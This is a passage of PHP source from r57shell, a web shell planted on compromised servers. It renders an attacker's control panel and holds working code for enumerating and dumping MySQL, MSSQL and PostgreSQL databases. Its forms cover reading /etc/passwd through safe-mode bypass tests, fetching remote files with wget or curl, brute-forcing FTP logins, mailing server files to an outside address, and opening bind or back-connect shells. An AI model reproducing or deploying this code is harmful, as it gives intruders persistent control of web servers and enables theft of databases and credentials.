1905 echo " | - ".$row2[0]."\r\n";
1906 if(isset($_POST['sc']))
1907 {
1908 $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
1909 while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; }
1910 }
1911 }
1912 }
1913 }
1914 @mysql_close($db);
1915 }
1916 else echo "[-] ERROR! Can't connect to MySQL server";
1917 break;
1918 case 'MSSQL':
1919 if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
1920 $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
1921 if($db)
1922 {
1923 $res=@mssql_query("sp_databases", $db);
1924 while(($row=@mssql_fetch_row($res)))
1925 {
1926 echo "[+] ".$row[0]."\r\n";
1927 if(isset($_POST['st'])){
1928 @mssql_select_db($row[0]);
1929 $res2 = @mssql_query("sp_tables",$db);
1930 while(($row2=@mssql_fetch_array($res2)))
1931 {
1932 if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
1933 {
1934 echo " | - ".$row2['TABLE_NAME']."\r\n";
1935 if(isset($_POST['sc']))
1936 {
1937 $res3 = @mssql_query("sp_columns ".$row2[2],$db);
1938 while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; }
1939 }
1940 }
1941 }
1942 }
1943 }
1944 @mssql_close($db);
1945 }
1946 else echo "[-] ERROR! Can't connect to MSSQL server";
1947 break;
1948 case 'PostgreSQL':
1949 if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
1950 $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
1951 $db = @pg_connect($str);
1952 if($db)
1953 {
1954 $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
1955 while(($row=@pg_fetch_row($res)))
1956 {
1957 echo "[+] ".$row[0]."\r\n";
1958 }
1959 @pg_close($db);
1960 }
1961 else echo "[-] ERROR! Can't connect to PostgreSQL server";
1962 break;
1963 }
1964 }
1965if ($_POST['cmd']=="mysql_dump")
1966 {
1967 if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
1968 if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
1969 $sqh = "# homepage: http://rst.void.ru\r\n";
1970 $sqh .= "# ---------------------------------\r\n";
1971 $sqh .= "# date : ".date ("j F Y g:i")."\r\n";
1972 $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
1973 $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n";
1974 $sqh .= "# ---------------------------------\r\n\r\n";
1975 switch($_POST['db']){
1976 case 'MySQL':
1977 if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
1978 $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
1979 if($db)
1980 {
1981 if(@mysql_select_db($_POST['mysql_db'],$db))
1982 {
1983 $sql1 = "# MySQL dump created by r57shell\r\n";
1984 $sql1 .= $sqh;
1985 $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
1986 $row = @mysql_fetch_row($res);
1987 $sql1 .= $row[1]."\r\n\r\n";
1988 $sql1 .= "# ---------------------------------\r\n\r\n";
1989 $sql2 = '';
1990 $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
1991 if (@mysql_num_rows($res) > 0) {
1992 while (($row = @mysql_fetch_assoc($res))) {
1993 $keys = @implode("`, `", @array_keys($row));
1994 $values = @array_values($row);
1995 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
1996 $values = @implode("', '", $values);
1997 $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
1998 }
1999 $sql2 .= "\r\n# ---------------------------------";
2000 }
2001 if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
2002 else { echo $sql1.$sql2; }
2003 }
2004 else echo "[-] ERROR! Can't select database";
2005 @mysql_close($db);
2006 }
2007 else echo "[-] ERROR! Can't connect to MySQL server";
2008 break;
2009 case 'MSSQL':
2010 if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
2011 $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
2012 if($db)
2013 {
2014 if(@mssql_select_db($_POST['mysql_db'],$db))
2015 {
2016 $sql1 = "# MSSQL dump created by r57shell\r\n";
2017 $sql1 .= $sqh;
2018 $sql2 = '';
2019 $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
2020 if (@mssql_num_rows($res) > 0) {
2021 while (($row = @mssql_fetch_assoc($res))) {
2022 $keys = @implode(", ", @array_keys($row));
2023 $values = @array_values($row);
2024 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
2025 $values = @implode("', '", $values);
2026 $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
2027 }
2028 $sql2 .= "\r\n# ---------------------------------";
2029 }
2030 if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
2031 else { echo $sql1.$sql2; }
2032 }
2033 else echo "[-] ERROR! Can't select database";
2034 @mssql_close($db);
2035 }
2036 else echo "[-] ERROR! Can't connect to MSSQL server";
2037 break;
2038 case 'PostgreSQL':
2039 if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
2040 $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
2041 $db = @pg_connect($str);
2042 if($db)
2043 {
2044 $sql1 = "# PostgreSQL dump created by r57shell\r\n";
2045 $sql1 .= $sqh;
2046 $sql2 = '';
2047 $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
2048 if (@pg_num_rows($res) > 0) {
2049 while (($row = @pg_fetch_assoc($res))) {
2050 $keys = @implode(", ", @array_keys($row));
2051 $values = @array_values($row);
2052 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
2053 $values = @implode("', '", $values);
2054 $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
2055 }
2056 $sql2 .= "\r\n# ---------------------------------";
2057 }
2058 if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
2059 else { echo $sql1.$sql2; }
2060 @pg_close($db);
2061 }
2062 else echo "[-] ERROR! Can't connect to PostgreSQL server";
2063 break;
2064 }
2065 }
2066 else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
2067 }
2068echo "</textarea></div>";
2069echo "</b>";
2070echo "</td></tr></table>";
2071echo "<table width=100% cellpadding=0 cellspacing=0>";
2072function up_down($id)
2073 {
2074 global $lang;
2075 global $language;
2076 return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
2077 }
2078function div($id)
2079 {
2080 if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
2081 return '<div id="'.$id.'">';
2082 }
2083if(!$safe_mode){
2084echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
2085echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
2086echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2087echo $te.'</div>'.$table_end1.$fe;
2088}
2089else{
2090echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
2091echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
2092echo $te.'</div>'.$table_end1.$fe;
2093}
2094echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
2095echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2096echo $te.'</div>'.$table_end1.$fe;
2097if($safe_mode){
2098echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
2099echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2100echo $te.'</div>'.$table_end1.$fe;
2101}
2102if($safe_mode && $unix){
2103echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
2104echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2105echo $te.'</div>'.$table_end1.$fe;
2106}
2107if(!$safe_mode){
2108foreach ($aliases as $alias_name=>$alias_cmd)
2109 {
2110 $aliases2 .= "<option>$alias_name</option>";
2111 }
2112echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
2113echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2114echo $te.'</div>'.$table_end1.$fe;
2115}
2116echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
2117echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2118echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2119echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2120echo $te.'</div>'.$table_end1.$fe;
2121if(!$safe_mode && $unix){
2122echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
2123echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2124echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2125echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2126echo $te.'</div>'.$table_end1.$fe;
2127}
2128echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
2129echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
2130echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
2131echo "</textarea>";
2132echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2133echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2134echo "</div></div></font>";
2135echo $table_end1.$fe;
2136if($safe_mode&&$curl_on)
2137{
2138echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
2139echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2140echo $te.'</div>'.$table_end1.$fe;
2141}
2142if($safe_mode)
2143{
2144echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
2145echo "<table class=table1 width=100% align=center>";
2146echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2147echo $te.'</div>'.$table_end1.$fe;
2148}
2149if($safe_mode&&$mysql_on)
2150{
2151echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
2152echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2153echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2154echo $te.'</div>'.$table_end1.$fe;
2155}
2156if($safe_mode&&$mssql_on)
2157{
2158echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
2159echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2160echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2161echo $te.'</div>'.$table_end1.$fe;
2162}
2163if(@ini_get('file_uploads')){
2164echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2165echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
2166echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
2167echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2168echo $te.'</div>'.$table_end1.$fe;
2169}
2170if(!$safe_mode&&!$windows){
2171echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
2172echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2173echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2174echo $te.'</div>'.$table_end1.$fe;
2175}
2176echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
2177echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2178$arh = $lang[$language.'_text92'];
2179if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
2180if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2181
2182if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2183echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2184echo $te.'</div>'.$table_end1.$fe;
2185if(@function_exists("ftp_connect")){
2186echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2187echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2188echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2189echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2190echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2191echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2192echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2193echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2194echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2195echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2196echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2197echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2198echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2199echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2200echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2201echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2202echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2203echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2204echo $te."</td>".$fe."</tr></div></table>";
2205}
2206if($unix && @function_exists("ftp_connect")){
2207echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
2208echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2209echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2210echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2211echo $te.'</div>'.$table_end1.$fe;
2212}
2213if(@function_exists("mail")){
2214echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2215echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2216echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2217echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2218echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
2219echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2220echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2221echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2222echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2223echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2224echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2225echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
2226echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2227$arh = $lang[$language.'_text92'];
2228if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
2229if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2230if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2231echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2232echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2233echo $te."</td>".$fe."</tr></div></table>";
2234}
2235if($mysql_on||$mssql_on||$pg_on||$ora_on)
2236{
2237$select = '<select name=db>';
2238if($mysql_on) $select .= '<option>MySQL</option>';
2239if($mssql_on) $select .= '<option>MSSQL</option>';
2240if($pg_on) $select .= '<option>PostgreSQL</option>';
2241if($ora_on) $select .= '<option>Oracle</option>';
2242$select .= '</select>';
2243echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2244echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>";
2245echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2246echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2247echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
2248echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2249echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
2250echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
2251echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
2252echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2253echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2254echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2255echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2256echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
2257echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2258echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2259echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
2260echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
2261echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2262echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
2263echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2264echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2265echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2266echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2267echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
2268echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2269echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2270echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2271echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2272}
2273if(!$safe_mode&&!$windows){
2274echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2275echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2276echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
2277echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
2278echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2279echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2280echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2281echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2282echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2283echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
